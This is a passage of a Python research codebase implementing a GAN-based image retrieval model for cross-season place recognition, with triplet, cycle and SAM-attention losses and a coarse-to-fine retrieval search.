self.n_domains, opt.norm, opt.use_dropout, self.gpu_ids)\n self.top_n = opt.top_n\n\n self.last_retrieval_index_c0 = 0\n self.last_retrieval_index_c1 = 0\n self.last_domain = 0\n\n if self.isTrain:\n blur_fn = lambda x: torch.nn.functional.conv2d(x, self.Tensor(util().gkern_2d()), groups=3, padding=2)\n self.netD = networks.define_D(opt.output_nc, opt.ndf, opt.netD_n_layers,\n self.n_domains, blur_fn, opt.norm, self.gpu_ids)\n\n if not self.isTrain or opt.continue_train:\n which_epoch = opt.which_epoch\n self.load_network(self.netG, 'G', which_epoch)\n if not self.isTrain:\n if opt.use_two_stage:\n self.load_network(self.netG_finer, 'G', opt.which_epoch_finer, self.use_two_stage)\n if self.isTrain:\n self.load_network(self.netD, 'D', which_epoch)\n\n if not self.isTrain:\n self.test_using_cos = opt.test_using_cos\n # used for retrieval\n self.database_feature_c0 = []\n self.database_path_c0 = []\n self.database_feature_c1 = []\n self.database_path_c1 = []\n self.database_dist_list_c0 = [] # only for visualization\n self.query_feature_list = []\n self.dist_mat_torch = None\n self.robotcar_database = []\n\n if self.isTrain:\n self.neg_B = self.Tensor(opt.num_hard_neg, opt.input_nc, opt.fineSize, opt.fineSize)\n self.train_using_cos = opt.train_using_cos\n self.fake_pools = [ImagePool(opt.pool_size) for _ in range(self.n_domains)]\n # used in the adaptive triplet loss\n self.margin = opt.margin\n self.adapt = opt.adapt\n self.margin_sam_triplet = opt.margin_sam_triplet\n self.adapt_sam_triplet = opt.adapt_sam_triplet\n self.use_realAB_as_negative = opt.use_realAB_as_negative\n self.hard_negative = opt.hard_negative\n # define loss functions\n self.criterionCycle = torch.nn.SmoothL1Loss()\n self.criterionGAN = networks.GANLoss(use_lsgan=not opt.no_lsgan, tensor=self.Tensor)\n # initialize optimizers\n self.netG.init_optimizers(torch.optim.Adam, opt.lr, (opt.beta1, 0.999))\n self.netD.init_optimizers(torch.optim.Adam, opt.lr, (opt.beta1, 0.999))\n # initialize loss storage\n self.loss_D, self.loss_G = [0] * self.n_domains, [0] * self.n_domains\n self.loss_cycle = [0] * self.n_domains\n self.loss_triplet = [0] * self.n_domains\n self.loss_sam = [0] * self.n_domains\n self.loss_sam_triplet = [0] * self.n_domains\n self.feature_distance = [0] * self.n_domains\n self.feature_cos = [0] * self.n_domains\n self.use_cos_latent_with_L2 = opt.use_cos_latent_with_L2\n # initialize loss multipliers\n self.lambda_triplet, self.lambda_cyc, self.lambda_latent = opt.lambda_triplet, opt.lambda_cycle, opt.lambda_latent\n self.lambda_sam, self.lambda_sam_triplet = opt.lambda_sam, opt.lambda_sam_triplet\n\n def set_input(self, input):\n input_A = input['A']\n self.real_A.resize_(input_A.size()).copy_(input_A)\n self.DA = input['DA'][0]\n if self.isTrain:\n input_B = input['B']\n self.real_B.resize_(input_B.size()).copy_(input_B)\n self.DB = input['DB'][0]\n if self.hard_negative:\n self.neg_B = input['neg_B_tensor'][0].cuda()\n self.neg_DB_list = input['neg_DB_list'][0]\n self.image_paths = input['path']\n\n def image_retrieval(self, query_encoded, query_path, query_encoded_finer=None, test_index=-1):\n \"\"\"\n Used to retrieve the target image in the database given the query encoded feature\n :param query_encoded: the query code\n :param query_path: the path of query image\n :param query_encoded_finer: the query code in the finer retrieval model\n :param test_index: the index of input query images when testing\n :return: the retrieved iamge path and the encoded feature in the database\n \"\"\"\n min_dix = 100000\n if self.use_two_stage:\n top_n_tensor = torch.ones(self.top_n) * 100000\n top_n_tensor = top_n_tensor.cuda()\n top_n_index = torch.ones(self.top_n)\n path = None\n final_index = 0\n\n if query_path.split('/')[-1][11] == '0':\n # for c0, camera 0 in the CMU-Seasons dataset\n self.database_dist_list_c0 = []\n for i, db_path in enumerate(self.database_path_c0):\n if self.test_using_cos:\n # use the cosine retrieval metric\n if self.opt.mean_cos:\n dist = -self.mean_cos(query_encoded.view(256, -1),\n self.database_feature_c0[i][0].view(256, -1)).mean(0)\n else:\n dist = -self.cos(query_encoded.view(-1),\n self.database_feature_c0[i][0].view(-1))\n else:\n # use L2 metric\n dist = self.L2loss(query_encoded.view(-1), self.database_feature_c0[i][0].view(-1))\n self.database_dist_list_c0.append(dist.item())\n if not self.use_two_stage:\n if dist < min_dix:\n min_dix = dist\n final_index = i\n path = db_path\n else:\n # find top N for finer retrieval\n if dist < top_n_tensor[self.top_n - 1]:\n top_n_tensor[self.top_n - 1] = dist\n top_n_index[self.top_n - 1] = i\n tmp = top_n_tensor.sort()\n top_n_tensor = tmp[0]\n top_n_index = top_n_index[tmp[1]]\n if self.use_two_stage:\n # from coarse to fine strategy\n for i in list(range(self.top_n)):\n if self.test_using_cos:\n if self.opt.meancos_finer:\n dist = -self.mean_cos(query_encoded_finer.view(256, -1),\n self.database_feature_c0[top_n_index[i].int()][1].view(256, -1)).mean(0)\n else:\n dist = -self.cos(query_encoded_finer.view(-1),\n self.database_feature_c0[top_n_index[i].int()][1].view(-1))\n else:\n dist = self.L2loss(query_encoded_finer.view(-1),\n self.database_feature_c0[top_n_index[i].int()][1].view(-1))\n if dist < min_dix:\n min_dix = dist\n final_index = top_n_index[i].int()\n path = self.database_path_c0[final_index]\n if self.opt.save_sam_visualization and test_index % 10 == 0:\n # save the visualized SAM maps\n self.find_grad_sam(query_encoded_finer, query_path, self.database_feature_c0[\n self.database_dist_list_c0.index(sorted(self.database_dist_list_c0)[100])][1], test_index, 100)\n self.find_grad_sam(self.database_feature_c0[\n self.database_dist_list_c0.index(sorted(self.database_dist_list_c0)[100])][\n 1], self.database_path_c0[\n self.database_dist_list_c0.index(sorted(self.database_dist_list_c0)[100])],\n query_encoded_finer, test_index, 100)\n self.find_grad_sam(query_encoded_finer, self.image_paths[0],\n self.database_feature_c0[final_index][1], test_index)\n self.find_grad_sam(self.database_feature_c0[final_index][1], path, query_encoded_finer, test_index)\n print(\"Minimun distance is :\", min_dix.item(), \" least index: \", final_index)\n print(\"Retrieved path: \", path.split('/')[-1], \" query path: \", query_path.split('/')[-1])\n else:\n for i, db_path in enumerate(self.database_path_c1):\n # for camera 1\n if self.test_using_cos:\n if self.opt.mean_cos:\n dist = -self.mean_cos(query_encoded.view(256, -1),\n self.database_feature_c1[i][0].view(256, -1)).mean(0)\n else:\n dist = -self.cos(query_encoded.view(-1),\n self.database_feature_c1[i][0].view(-1)) # + L2loss(query_encoded,item[1])*0\n else:\n dist = self.L2loss(query_encoded.view(-1), self.database_feature_c1[i][0].view(-1))\n if not self.use_two_stage:\n if dist < min_dix:\n min_dix = dist\n final_index = i\n path = db_path\n else:\n if dist < top_n_tensor[self.top_n - 1]:\n top_n_tensor[self.top_n - 1] = dist\n top_n_index[self.top_n - 1] = i\n tmp = top_n_tensor.sort()\n top_n_tensor = tmp[0]\n top_n_index = top_n_index[tmp[1]]\n if self.use_two_stage:\n for i in list(range(self.top_n)):\n if self.test_using_cos:\n if self.opt.meancos_finer:\n dist = -self.mean_cos(query_encoded_finer.view(256, -1),\n self.database_feature_c1[top_n_index[i].int()][1].view(256, -1)).mean(0)\n else:\n dist = -self.cos(query_encoded_finer.view(-1),\n self.database_feature_c1[top_n_index[i].int()][1].view(-1))\n else:\n dist = self.L2loss(query_encoded_finer.view(-1),\n self.database_feature_c1[top_n_index[i].int()][1].view(-1))\n if dist < min_dix:\n min_dix = dist\n final_index = top_n_index[i].int()\n path = self.database_path_c1[final_index]\n print(\"Minimun distance is :\", min_dix.item(), \" least index: \", final_index)\n print(\"Retrieved path: \", path.split('/')[-1], \" query path: \", query_path.split('/')[-1])\n if query_path.split('/')[-1][11] == '0':\n if self.use_two_stage:\n return path, self.database_feature_c0[final_index][1]\n else:\n return path, self.database_feature_c0[final_index][0]\n else:\n if self.use_two_stage:\n return path, self.database_feature_c1[final_index][1]\n else:\n return path, self.database_feature_c1[final_index][0]\n\n def test(self, index=0):\n with torch.no_grad():\n self.visuals = [self.real_A]\n self.labels = ['query_image_%d' % self.DA]\n raw_encoded = self.netG.encode(self.real_A, self.DA)\n raw_encoded_finer = None\n if self.use_two_stage: raw_encoded_finer = self.netG_finer.encode(self.real_A, self.DA)\n if self.DA == 0:\n # building the feature database\n db_path = copy.deepcopy(self.image_paths[0])\n if db_path.split('/')[-1][11] == '0':\n self.database_feature_c0.append((raw_encoded, raw_encoded_finer))\n self.database_path_c0.append(db_path)\n else:\n self.database_feature_c1.append((raw_encoded, raw_encoded_finer))\n self.database_path_c1.append(db_path)\n return \"database\"\n else:\n path, retrieved_image = self.image_retrieval(raw_encoded, self.image_paths[0], raw_encoded_finer, index)\n return path\n\n def find_grad_sam(self, raw_encoded, query_path, retrieved_image, index, rank=-1):\n with torch.set_grad_enabled(True):\n new_raw_encoded = copy.deepcopy(raw_encoded.view(256, 64, 64)).cuda()\n new_raw_encoded.requires_grad_(True)\n new_retrieved_image = copy.deepcopy(retrieved_image.view(256, 64, 64)).cuda()\n mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n mean_cos_similarity = mean_cos(new_raw_encoded.view(256, -1), new_retrieved_image.view(256, -1)).mean(0)\n mean_cos_similarity.backward()\n\n mask = F.relu(torch.mul(new_raw_encoded,\n new_raw_encoded.grad.sum(1).sum(1).view(256, 1, 1).expand([256, 64, 64])).sum(\n dim=0))\n # normalization\n mask -= mask.min()\n mask /= mask.max()\n mask = cv2.resize(mask.cpu().detach().numpy(), (256, 256))\n heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)\n heatmap = np.float32(heatmap) / 255\n heatmap = heatmap[..., ::-1] # gbr to rgb\n img = io.imread(query_path)\n img = np.float32(cv2.resize(img, (256, 256))) / 255\n\n sam = heatmap + np.float32(img)\n sam = norm_image(sam)\n heatmap = norm_image(heatmap)\n img = norm_image(img)\n if not os.path.exists(self.opt.sam_matched_dir):\n os.makedirs(self.opt.sam_matched_dir)\n if not os.path.exists(self.opt.sam_mismatched_dir):\n os.makedirs(self.opt.sam_mismatched_dir)\n if rank == -1:\n io.imsave(self.opt.sam_matched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_sam' + '_' +\n query_path.split('/')[-1], sam)\n io.imsave(self.opt.sam_matched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_heat' + '_' +\n query_path.split('/')[-1], heatmap)\n io.imsave(self.opt.sam_matched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_img' + '_' +\n query_path.split('/')[-1], img)\n\n else:\n io.imsave(self.opt.sam_mismatched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_sam_' + str(\n rank) + '_' + query_path.split('/')[\n -1], sam)\n io.imsave(self.opt.sam_mismatched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_heat_' + str(\n rank) + '_' + query_path.split('/')[\n -1], heatmap)\n io.imsave(self.opt.sam_mismatched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_img_' + str(\n rank) + '_' + query_path.split('/')[\n -1], img)\n\n def find_sam_weight(self, query, db):\n mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n mean_cos_similarity = mean_cos(query.view(256, -1), db.view(256, -1)).mean(0)\n grad_map = torch.autograd.grad(mean_cos_similarity, query, create_graph=True)[0]\n weight = grad_map.sum(1).sum(1).view(256, 1, 1).expand([256, 64, 64])\n return weight\n\n def get_image_paths(self):\n return self.image_paths\n\n def save_features(self):\n with torch.no_grad():\n self.labels = ['query_image_%d' % self.DA]\n raw_encoded = self.netG.encode(self.real_A, self.DA)\n\n encoded = raw_encoded.view(-1) # encoded_new1\n encoded_np = encoded.cpu().numpy()\n db_path = copy.deepcopy(self.image_paths[0])\n if not os.path.exists(\"./features/\" + db_path.split('/')[-3]):\n os.makedirs(\"./features/\" + db_path.split('/')[-3])\n print(\"./features/\" + db_path.split('/')[-3] + '/' + db_path.split('/')[-1][:-4])\n np.savez(\"./features/\" + db_path.split('/')[-3] + '/' + db_path.split('/')[-1][:-4], encoded_np, db_path)\n if self.use_two_stage:\n if not os.path.exists(\"./features_finer/\" + db_path.split('/')[-3]):\n os.makedirs(\"./features_finer/\" + db_path.split('/')[-3])\n raw_encoded_finer = self.netG_finer.encode(self.real_A, self.DA)\n np.savez(\"./features_finer/\" + db_path.split('/')[-3] + '/' + db_path.split('/')[-1][:-4],\n raw_encoded_finer.view(-1).cpu().numpy(),\n db_path)\n\n def find_query_features(self):\n with torch.no_grad():\n self.labels = ['query_image_%d' % self.DA]\n raw_encoded = self.netG.encode(self.real_A, self.DA)\n encoded = raw_encoded.view(-1) # encoded_new1\n\n # image = copy.deepcopy(self.real_A)\n qr_path = copy.deepcopy(self.image_paths[0])\n if self.use_two_stage:\n raw_encoded_finer = self.netG_finer.encode(self.real_A, self.DA).view(-1)\n else:\n raw_encoded_finer = None\n pair = (encoded, qr_path, raw_encoded_finer)\n # if len(list) % 1 == 0:\n self.query_feature_list.append(pair) # image and coder\n\n def find_dist_mat(self):\n cos = torch.nn.CosineSimilarity(dim=0, eps=1e-8)\n mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n dist_mat = []\n if self.opt.only_for_finer:\n self.dirs = sorted(glob.glob(\"./features_finer/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n else:\n self.dirs = sorted(glob.glob(\"./features/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n for i, name in enumerate(self.dirs):\n print(i, name)\n feature_path = np.load(name)\n self.robotcar_database.append(torch.from_numpy(feature_path['arr_0']).view(256, 64, 64))\n dist_mat_row = []\n for j, query_feat in enumerate(self.query_feature_list):\n if self.opt.mean_cos:\n dist = 1 - mean_cos(query_feat[0].view(256, -1),\n torch.from_numpy(feature_path['arr_0']).cuda().view(256, -1)).mean()\n else:\n dist = 1 - cos(query_feat[0],\n torch.from_numpy(\n feature_path['arr_0']).cuda()) * 1 # + L2loss(query_encoded,item[1])*0\n dist_mat_row.append(dist.cpu().numpy().tolist())\n dist_mat.append(dist_mat_row)\n if self.opt.mean_cos:\n mean_cos = \"meancos\"\n else:\n mean_cos = \"plaincos\"\n if self.opt.meancos_finer:\n mean_cos_finer = \"meancosfiner\"\n else:\n mean_cos_finer = \"plaincosfiner\"\n np.savez(\n \"dist_mat_cos_\" + self.opt.dataroot.split('/')[3] + \"_env\" + str(self.opt.test_condition) + '_' + mean_cos\n + '_' + mean_cos_finer,\n np.array(dist_mat))\n self.dist_mat_torch = torch.from_numpy(np.array(dist_mat)).cuda()\n\n def load_dist_mat(self):\n if self.opt.mean_cos:\n mean_cos = \"meancos\"\n else:\n mean_cos = \"plaincos\"\n if self.opt.meancos_finer:\n mean_cos_finer = \"meancosfiner\"\n else:\n mean_cos_finer = \"plaincosfiner\"\n if self.opt.only_for_finer:\n self.dirs = sorted(glob.glob(\"./features_finer/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n else:\n self.dirs = sorted(glob.glob(\"./features/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n for i, name in enumerate(self.dirs):\n print(i, name)\n self.robotcar_database.append(torch.from_numpy(np.load(name)['arr_0']).view(256, 64, 64))\n self.dist_mat_torch = torch.from_numpy(\n np.load(\"dist_mat_cos_\" + self.opt.dataroot.split('/')[3] + \"_env\" + str(\n self.opt.test_condition) + '_' + mean_cos\n + '_' + mean_cos_finer + \".npz\")[\n 'arr_0']).cuda()\n\n def find_retrieval(self):\n query_path = []\n retrieved_path = []\n if self.use_two_stage:\n cos = torch.nn.CosineSimilarity(dim=0, eps=1e-8)\n mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n _, least_dist_index_topN = torch.sort(self.dist_mat_torch, 0)\n least_dist_index_topN = least_dist_index_topN.transpose(0, 1)[:, :self.top_n]\n self.dirs_finer = sorted(glob.glob(\"./features_finer/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n for query_index, top_n_index in enumerate(least_dist_index_topN):\n query_feature = self.query_feature_list[query_index][2]\n least_value = 1000000\n path = None\n for _index in top_n_index:\n if self.opt.mean_cos:\n dist = 1 - mean_cos(query_feature.view(256, -1),\n torch.from_numpy(\n np.load(self.dirs_finer[_index.cpu().numpy()])['arr_0']).cuda().view(\n 256, -1)).mean()\n else:\n dist = 1 - cos(query_feature,\n torch.from_numpy(\n np.load(self.dirs_finer[_index.cpu().numpy()])['arr_0']).cuda()) * 1\n if dist < least_value:\n least_value = dist\n path = self.dirs_finer[_index.cpu().numpy()]\n retrieved_path.append(path)\n query_path.append(self.query_feature_list[query_index][1])\n print(\"query_path: \", query_path)\n print(\"retrieved_path: \", retrieved_path)\n else:\n if not self.opt.save_sam_visualization:\n least_dist_index = torch.argmin(self.dist_mat_torch, 0).cpu().numpy()\n for i in list(range(least_dist_index.size)):\n query_path.append(self.query_feature_list[i][1])\n retrieved_path.append(self.dirs[least_dist_index[i]])\n else:\n _, least_dist_index_topN = torch.sort(self.dist_mat_torch, 0)\n least_dist_index = least_dist_index_topN.transpose(0, 1)[:, :100].cpu().numpy()\n for i in list(range(least_dist_index.size)):\n query_path.append(self.query_feature_list[i][1])\n retrieved_path.append(self.dirs[least_dist_index[i][0]])\n if i % 10 == 0:\n self.find_grad_sam(self.query_feature_list[i][0], self.query_feature_list[i][1],\n self.robotcar_database[least_dist_index[i][0]], i)\n self.find_grad_sam(self.robotcar_database[least_dist_index[i][0]],\n self.opt.dataroot + \"test00/\" + self.dirs[least_dist_index[i][0]].split('/')[\n -1][\n :-4] + \".jpg\", self.query_feature_list[i][0],\n i)\n self.find_grad_sam(self.query_feature_list[i][0], self.query_feature_list[i][1],\n self.robotcar_database[least_dist_index[i][99]], i, 100)\n self.find_grad_sam(self.robotcar_database[least_dist_index[i][99]],\n self.opt.dataroot + \"test00/\" + self.dirs[least_dist_index[i][0]].split('/')[\n -1][\n :-4] + \".jpg\",\n self.query_feature_list[i][99], i,\n 100)\n\n print(\"query_path: \", query_path)\n print(\"retrieved_path: \", retrieved_path)\n return query_path, retrieved_path\n\n def backward_D_basic(self, real, fake, domain):\n # Real\n pred_real = self.netD.forward(real, domain)\n loss_D_real = self.criterionGAN(pred_real, True)\n # Fake\n pred_fake = self.netD.forward(fake.detach(), domain)\n loss_D_fake = self.criterionGAN(pred_fake, False)\n # Combined loss\n loss_D = (loss_D_real + loss_D_fake) * 0.5\n # backward\n loss_D.backward()\n return loss_D\n\n def backward_D(self):\n # D_A\n fake_B = self.fake_pools[self.DB].query(self.fake_B)\n self.loss_D[self.DA] = self.backward_D_basic(self.real_B, fake_B, self.DB)\n # D_B\n fake_A = self.fake_pools[self.DA].query(self.fake_A)\n self.loss_D[self.DB] = self.backward_D_basic(self.real_A, fake_A, self.DA)\n\n def backward_G(self):\n encoded_A = self.netG.encode(self.real_A, self.DA)\n encoded_B = self.netG.encode(self.real_B, self.DB)\n\n # GAN loss\n # D_A(G_A(A))\n self.fake_B = self.netG.decode(encoded_A, self.DB)\n pred_fake = self.netD.forward(self.fake_B, self.DB)\n self.loss_G[self.DA] = self.criterionGAN(pred_fake, True)\n # D_B(G_B(B))\n self.fake_A = self.netG.decode(encoded_B, self.DA)\n pred_fake = self.netD.forward(self.fake_A, self.DA)\n self.loss_G[self.DB] = self.criterionGAN(pred_fake, True)\n # Forward cycle loss\n rec_encoded_A = self.netG.encode(self.fake_B, self.DB)\n self.rec_A = self.netG.decode(rec_encoded_A, self.DA)\n self.loss_cycle[self.DA] = self.criterionCycle(self.rec_A, self.real_A)\n # Backward cycle loss\n rec_encoded_B = self.netG.encode(self.fake_A, self.DA)\n self.rec_B = self.netG.decode(rec_encoded_B, self.DB)\n self.loss_cycle[self.DB] = self.criterionCycle(self.rec_B, self.real_B)\n\n if self.hard_negative:\n neg_B_features = self.netG.encode(self.neg_B, self.DB)\n\n if self.use_realAB_as_negative:\n if self.hard_negative:\n least_index = torch.argmin(torch.Tensor(\n [self.L2loss(encoded_A.view(-1), neg_B.view(-1).detach()) for neg_B in neg_B_features])).item()\n dnA = self.L2loss(encoded_A.view(-1), neg_B_features[least_index].view(-1).detach())\n else:\n dnA = self.L2loss(encoded_A.view(-1), encoded_B.view(-1).detach())\n else:\n if self.hard_negative:\n least_index = torch.argmin(torch.Tensor(\n [self.L2loss(rec_encoded_A.view(-1), neg_B.view(-1).detach()) for neg_B in neg_B_features])).item()\n dnA = self.L2loss(rec_encoded_A.view(-1), neg_B_features[least_index].view(-1).detach())\n else:\n dnA = self.L2loss(rec_encoded_A.view(-1), encoded_B.view(-1).detach())\n dpA = self.L2loss(rec_encoded_A.view(-1), encoded_A.view(\n -1).detach())\n\n if self.opt.mean_cos:\n cospA = 1 - self.mean_cos(rec_encoded_A.view(256, -1), encoded_A.view(256, -1)).mean(0)\n else:\n cospA = 1 - self.cos(rec_encoded_A.view(-1), encoded_A.view(-1))\n if self.lambda_triplet > 0:\n\n self.loss_triplet[self.DA] = torch.max(torch.cuda.FloatTensor([0.0]),\n 1 - dnA /\n (\n self.margin * torch.exp(\n self.adapt * (-dpA)) # dnA/dpA#s#self.margin\n + dpA))\n if self.hard_negative:\n self.loss_triplet[self.DA] = 2 * self.loss_triplet[self.DA]\n\n self.feature_distance[self.DA] = dpA\n self.feature_cos[self.DA] = cospA\n\n if not self.hard_negative:\n if self.use_realAB_as_negative:\n dnB = self.L2loss(encoded_B.view(-1), encoded_A.view(-1).detach())\n else:\n dnB = self.L2loss(rec_encoded_B.view(-1), encoded_A.view(-1).detach())\n dpB = self.L2loss(rec_encoded_B.view(-1), encoded_B.view(\n -1).detach())\n if self.opt.mean_cos:\n cospB = 1 - self.mean_cos(rec_encoded_B.view(256, -1), encoded_B.view(256, -1)).mean(0)\n else:\n cospB = 1 - self.cos(rec_encoded_B.view(-1), encoded_B.view(-1))\n if self.lambda_triplet > 0 and not self.hard_negative:\n self.loss_triplet[self.DB] = torch.max(torch.cuda.FloatTensor([0.0]),\n 1 - dnB / (self.margin * torch.exp(self.adapt * (-dpB)) + dpB))\n if self.hard_negative:\n self.loss_triplet[self.DB] = 0\n\n self.feature_distance[self.DB] = dpB\n self.feature_cos[self.DB] = cospB\n if self.lambda_latent > 0:\n if self.train_using_cos:\n loss_latent_A = cospA\n loss_latent_B = cospB\n if self.use_cos_latent_with_L2:\n loss_latent_A += dpA\n loss_latent_B += dpB\n else:\n loss_latent_A = dpA\n loss_latent_B = dpB\n else:\n loss_latent_A, loss_latent_B = 0, 0\n\n if self.lambda_sam > 0:\n self.loss_sam[self.DA] = self.L2loss(F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(encoded_A.view(256, 64, 64),\n rec_encoded_A.view(256, 64, 64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_A.view(256, 64, 64),\n self.find_sam_weight(rec_encoded_A.view(256, 64, 64),\n encoded_A.view(256, 64, 64))).sum(dim=0)).view(-1).detach())\n self.loss_sam[self.DB] = self.L2loss(F.relu(torch.mul(encoded_B.view(256, 64, 64),\n self.find_sam_weight(encoded_B.view(256, 64, 64),\n rec_encoded_B.view(256, 64, 64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_B.view(256, 64, 64),\n self.find_sam_weight(rec_encoded_B.view(256, 64, 64),\n encoded_B.view(256, 64, 64))).sum(dim=0)).view(-1).detach())\n\n if self.lambda_sam_triplet > 0:\n dp_samA = self.loss_sam[self.DA].cuda()\n dp_samB = self.loss_sam[self.DB].cuda()\n if self.use_realAB_as_negative:\n if not self.hard_negative:\n dn_samA = self.L2loss(F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n encoded_A.view(256, 64, 64),\n encoded_B.view(256, 64, 64))).sum(dim=0)).view(-1), F.relu(torch.mul(encoded_B.view(256, 64, 64),\n self.find_sam_weight(\n encoded_B.view(256, 64, 64),\n encoded_A.view(256, 64, 64))).sum(dim=0)).view(-1).detach())\n if self.hard_negative:\n least_index = torch.argmin(torch.Tensor(\n [self.L2loss(F.relu(torch.mul(neg_B.view(256, 64, 64),\n self.find_sam_weight(neg_B.view(256, 64, 64),\n encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n encoded_A.view(256, 64, 64),\n neg_B.view(256, 64,64))).sum(dim=0)).view(-1).detach()) for neg_B in neg_B_features])).item()\n dn_samB = self.L2loss(F.relu(torch.mul(neg_B_features[least_index].view(256, 64, 64),\n self.find_sam_weight(\n neg_B_features[least_index].view(256, 64, 64),\n encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n encoded_A.view(256, 64, 64),\n neg_B_features[least_index].view(256, 64,64))).sum(dim=0)).view(-1).detach())\n else:\n dn_samB = self.L2loss(F.relu(torch.mul(encoded_B.view(256, 64, 64),\n self.find_sam_weight(encoded_B.view(256, 64, 64),encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n encoded_A.view(256, 64, 64),\n encoded_B.view(256, 64,64))).sum(dim=0)).view(-1).detach())\n else:\n if not self.hard_negative:\n dn_samA = self.L2loss(F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(encoded_A.view(256, 64, 64),\n rec_encoded_B.view(256, 64,64))).sum(dim=0)).view(-1),\n\n F.relu(torch.mul(rec_encoded_B.view(256, 64, 64),\n self.find_sam_weight(\n rec_encoded_B.view(256, 64, 64),\n encoded_A.view(256, 64,64))).sum(dim=0)).view(-1).detach())\n if self.hard_negative:\n least_index = torch.argmin(torch.Tensor(\n [self.L2loss(F.relu(torch.mul(neg_B.view(256, 64, 64),\n self.find_sam_weight(neg_B.view(256, 64, 64),\n rec_encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n rec_encoded_A.view(256, 64, 64),\n neg_B.view(256, 64,64))).sum(dim=0)).view(-1).detach()) for neg_B in neg_B_features])).item()\n dn_samB = self.L2loss(F.relu(torch.mul(neg_B_features[least_index].view(256, 64, 64),\n self.find_sam_weight(\n neg_B_features[least_index].view(256, 64, 64),\n rec_encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n rec_encoded_A.view(256, 64, 64),\n neg_B_features[least_index].view(256, 64, 64))).sum(dim=0)).view(-1).detach())\n else:\n dn_samB = self.L2loss(F.relu(torch.mul(encoded_B.view(256, 64, 64),\n self.find_sam_weight(encoded_B.view(256, 64, 64),\n rec_encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n rec_encoded_A.view(256, 64, 64),\n encoded_B.view(256, 64,64))).sum(dim=0)).view(-1).detach())\n if not self.hard_negative:\n dn_samA = dn_samA.cuda()\n self.loss_sam_triplet[self.DA] = torch.max(torch.cuda.FloatTensor([0.0]),\n 1 - dn_samA /\n (self.margin_sam_triplet * torch.exp(self.adapt_sam_triplet * (-dp_samA))\n + dp_samA))\n dn_samB = dn_samB.cuda()\n self.loss_sam_triplet[self.DB] = torch.max(torch.cuda.FloatTensor([0.0]),\n 1 - dn_samB /\n (self.margin_sam_triplet * torch.exp(self.adapt_sam_triplet * (-dp_samB)) + dp_samB))\n if self.hard_negative:\n self.loss_sam_triplet[self.DA] = 0\n self.loss_sam_triplet[self.DB] = 2 * self.loss_sam_triplet[self.DB]\n\n # combined loss\n\n loss_G = self.loss_G[self.DA] + self.loss_G[self.DB] + \\\n (self.loss_cycle[self.DA] + self.loss_cycle[self.DB]) * self.lambda_cyc + \\\n (self.loss_triplet[self.DA] + self.loss_triplet[self.DB]) * self.lambda_triplet + \\\n (self.loss_sam[self.DA] + self.loss_sam[self.DB]) * self.lambda_sam + \\\n (self.loss_sam_triplet[self.DA] + self.loss_sam_triplet[self.DB]) * self.lambda_sam_triplet + \\\n (loss_latent_A + loss_latent_B) * self.lambda_latent\n loss_G.backward()\n\n def optimize_parameters(self):\n # G_A and G_B\n self.netG.zero_grads(self.DA, self.DB)\n self.backward_G()\n self.netG.step_grads(self.DA, self.DB)\n # D_A and D_B\n self.netD.zero_grads(self.DA, self.DB)\n self.backward_D()\n self.netD.step_grads(self.DA, self.DB)\n\n def get_current_errors(self):\n extract = lambda l: [(i if type(i) is int or type(i) is float else i.item()) for i in l]\n D_losses, G_losses, cyc_losses, feat_losses, feat_dist, cos_dist, sam_losses, loss_sam_triplet = \\\n extract(self.loss_D), extract(self.loss_G), extract(self.loss_cycle), \\\n extract(self.loss_triplet), extract(self.feature_distance), extract(self.feature_cos), extract(self.loss_sam), extract(self.loss_sam_triplet)\n\n return OrderedDict(\n [('D', D_losses), ('G', G_losses), ('Cyc', cyc_losses), ('Feat', feat_losses), ('Feat_dist', feat_dist),\n ('Cosine_dist', cos_dist), ('SAM', list(map(lambda x: x * 100000000, sam_losses))),\n ('SAM_triplet_feat', loss_sam_triplet)])\n\n def get_current_visuals(self, testing=False):\n if not testing:\n self.visuals = [self.real_A, self.fake_B, self.rec_A, self.real_B, 